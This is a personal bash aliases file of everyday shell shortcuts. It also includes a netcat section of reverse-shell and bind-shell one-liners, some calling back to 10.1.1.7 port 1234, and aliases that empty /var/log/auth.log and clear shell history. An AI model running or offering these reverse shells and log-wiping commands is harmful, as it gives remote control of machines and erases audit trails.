#http://askubuntu.com/questions/22037/aliases-not-available-when-using-sudo
alias sudo="sudo "
alias br='source ~/.bashrc'
alias ports='netstat -tulanp'
alias now='date +"%T"'
alias nowtime='now'
alias nowdate='date +"%d-%m-%Y"'
alias beep='echo -e "\a\c"'
alias beep-lots='while :; do beep; sleep 1; done'
alias checksum='rhash -r --md5 -p "%h, %p\n"'

#helper commands for other aliases
	alias all-users-with-bash-shell='getent passwd | grep /bin/bash | grep -v root | cut -d":" -f1'
	# fetch latest aliases and put them in /root and /etc/skel/
	alias github-new-aliases='sudo wget "https://raw.githubusercontent.com/tbennett6421/linux-utils/master/common-configs/bash_aliases" -O /etc/skel/.bash_aliases'
	# fetch latest vim and put them in /root and /etc/skel/
	alias github-new-vim='sudo mkdir -pv /etc/skel/.vim/plugin ; sudo mkdir -pv /root/.vim/plugin ; sudo wget "https://raw.githubusercontent.com/tbennett6421/linux-utils/master/common-configs/vimrc" -O /root/.vimrc ; sudo wget "https://raw.githubusercontent.com/tbennett6421/linux-utils/master/common-configs/vimrc" -O /etc/skel/.vimrc ; sudo wget "https://raw.githubusercontent.com/tbennett6421/linux-utils/master/common-configs/vim/plugin/IndexedSearch.vim" -O /root/.vim/plugin/IndexedSearch.vim ; sudo wget "https://raw.githubusercontent.com/tbennett6421/linux-utils/master/common-configs/vim/plugin/IndexedSearch.vim" -O /etc/skel/.vim/plugin/IndexedSearch.vim '
	# distribute /etc/skel/ to all home dirs
	alias distribute-github-stuff='for i in $(all-users-with-bash-shell); do sudo rsync -avh --progress /etc/skel/.bash_aliases /etc/skel/.vim* /home/$i/; sudo chown -R $i:$i /home/$i/.bash_aliases /home/$i/.vim* ; done'
	# remove etc/skel/, root, and all bash users bash_aliases and vim stuff
	alias cleanup-github-stuff='sudo rm -rf /etc/skel/.vim* /etc/skel/.bash_aliases /root/.bash_aliases /root/.vim* ; for i in $(all-users-with-bash-shell); do sudo rm -rf /home/$i/.bash_aliases /home/$i/.vim*; done'

# updating stuff
alias update-sys='sudo apt-get update && sudo apt-get upgrade'
alias update-github='cleanup-github-stuff ; github-new-aliases ; github-new-vim ; distribute-github-stuff'

### Enhanced commands ###
alias ls="ls -hp --color=auto"
alias ll='ls -la'
alias l.='ls -d .* ' 			#Show hidden files
alias ldir='ls -d */'
alias ll="ls -la"
alias ls-size="ll -lAS && echo '-------------Smallest-----'"
alias ls-time="ls -lAt && echo '-------------Oldest-----'"
alias df='df -H'
alias du='du -ch'				#grand-total human readable
alias mkdir='mkdir -pv' 		#create parent dirs on demand
alias chown='chown --preserve-root'
alias chmod='chmod --preserve-root'
alias chgrp='chgrp --preserve-root'
alias chmod-setgid='chmod g+s'
alias zip-dir='zip -r'
alias wget='wget -c'			#turn on wget resuming
alias wget-local='wget -p -k'
alias curl-follow='curl -O -J -L'
alias rsync-copy="rsync -avhP"
alias screen-name='screen -S'

### Safer commands ###
alias mv='mv -i'
alias cp='cp -i'
alias ln='ln -i'
alias rm='rm -I --preserve-root'

# when you mess up and type your password in the terminal
alias clear-history='history -cw'
alias wipe-auth='sudo cat /dev/null | sudo tee /var/log/auth.log'
alias wipe-all='clear-history ; wipe-auth'

# trims front and back whitespace plus tabs
alias trim='awk '\''{$1=$1};1'\'''
alias fixcut='tr -s " "'

#cd aliases
alias cd..='cd ..'
alias ..='cd ..'
alias ...='cd ../../../'
alias ....='cd ../../../../'
alias .....='cd ../../../../'
alias .4='cd ../../../../'
alias .5='cd ../../../../..'
#alias cd_steam='cd ~/.wine32/drive_c/Program\ Files/Steam/'
#alias cd_steamgames='cd ~/.wine32/drive_c/Program\ Files/Steam/steamapps/common/'
#alias cd_progx86='cd ~/.wine32/drive_c/Program\ Files/'

### openssl shortcuts
alias sha1='openssl sha1'
alias md5='openssl md5'

### Pretty commands
alias vmount='mount |column -t'
alias vpath='echo -e ${PATH//:/\\n}'

### User Definitions ###
# compile with max debugging
alias gcc-dev="gcc -g -Wall -Wextra -Winline"
# Get your current public IP
alias ip="curl icanhazip.com"	
alias ipinfo="curl ifconfig.me && curl ifconfig.me/host"
alias ipconfig="nmcli dev list iface eth0 | grep IP4"
# count files in directory
alias dircount='ls -1 | wc -l'
alias webify="mogrify -resize 690\> *.png"
alias most='du -hsx * | sort -rh | head -10'
alias sort-dir-by-size='du -ha --max-depth=1 | sort -h'
alias find_by_name_indir='sudo find . -iname '
alias find_by_name_root='sudo find / -iname '
alias grep_for_text='grep -inrI '

### Shortcuts ###
alias h='history'
alias c='clear'
alias cls='clear'
alias dc='dircount'

### useless stuff ###
#alias lostterm='export PS1="\[\033[01;32m\]>: "'
alias busy="cat /dev/urandom | hexdump -C | grep 'ca fe'"

### netcat ###
alias nc-trad-rev='nc -e /bin/sh 10.1.1.7 1234'
alias nc-trad-bind='nc -e /bin/sh -l 1234'
alias nc-trad-rev='nc -e /bin/bash 10.1.1.7 1234'
alias nc-trad-rev='nc -e /bin/bash -l 1234'
alias nc-sh-rev='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.1.7 1234 >/tmp/f'
alias nc-sh-bind='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 1234 >/tmp/f'
alias nc-bash-rev='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.1.1.7 1234 >/tmp/f'
alias nc-bash-bind='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 1234 >/tmp/f'

### Count lines of code
alias phplines-summary='( find ./ -name '*.php' -print0 | xargs -0 cat ) | wc -l'
alias phplines-verbose='find . -name '*.php' | xargs wc -l'

### Functions

backup() { cp "$1"{,.bak};}

extract() { 
    if [ -f $1 ] ; then 
      case $1 in 
        *.tar.bz2)   tar xjf $1     ;; 
        *.tar.gz)    tar xzf $1     ;; 
        *.bz2)       bunzip2 $1     ;; 
        *.rar)       unrar e $1     ;; 
        *.gz)        gunzip $1      ;; 
        *.tar)       tar xf $1      ;; 
        *.tbz2)      tar xjf $1     ;; 
        *.tgz)       tar xzf $1     ;; 
        *.zip)       unzip $1       ;; 
        *.Z)         uncompress $1  ;; 
        *.7z)        7z x $1        ;; 
        *.rar)       unrar e $1     ;; 
        *)     echo "'$1' cannot be extracted via extract()" ;; 
         esac 
     else 
         echo "'$1' is not a valid file" 
     fi 
}

sort_excluding_header(){ awk 'NR<2{print $0;next}{print $0 | "sort" }'; }

getlocation() { lynx -dump http://www.ip-adress.com/ip_tracer/?QRY=$1|grep address|egrep 'city|state|country'|awk '{print $3,$4,$5,$6,$7,$8}'|sed 's\ip address flag \\'|sed 's\My\\';} 

#nosoundonchrome() {
#    killall pulseaudio;
#    rm -r ~/.config/pulse/*;
#    rm -r ~/.pulse*;
#}

#alias start_controller='sudo xboxdrv --silent --detach-kernel-driver --trigger-as-button --ui-axismap x2=ABS_Z,y2=ABS_RZ --ui-buttonmap A=BTN_B,B=BTN_X,X=BTN_A,TR=BTN_THUMBL,TL=BTN_MODE,GUIDE=BTN_THUMBR'
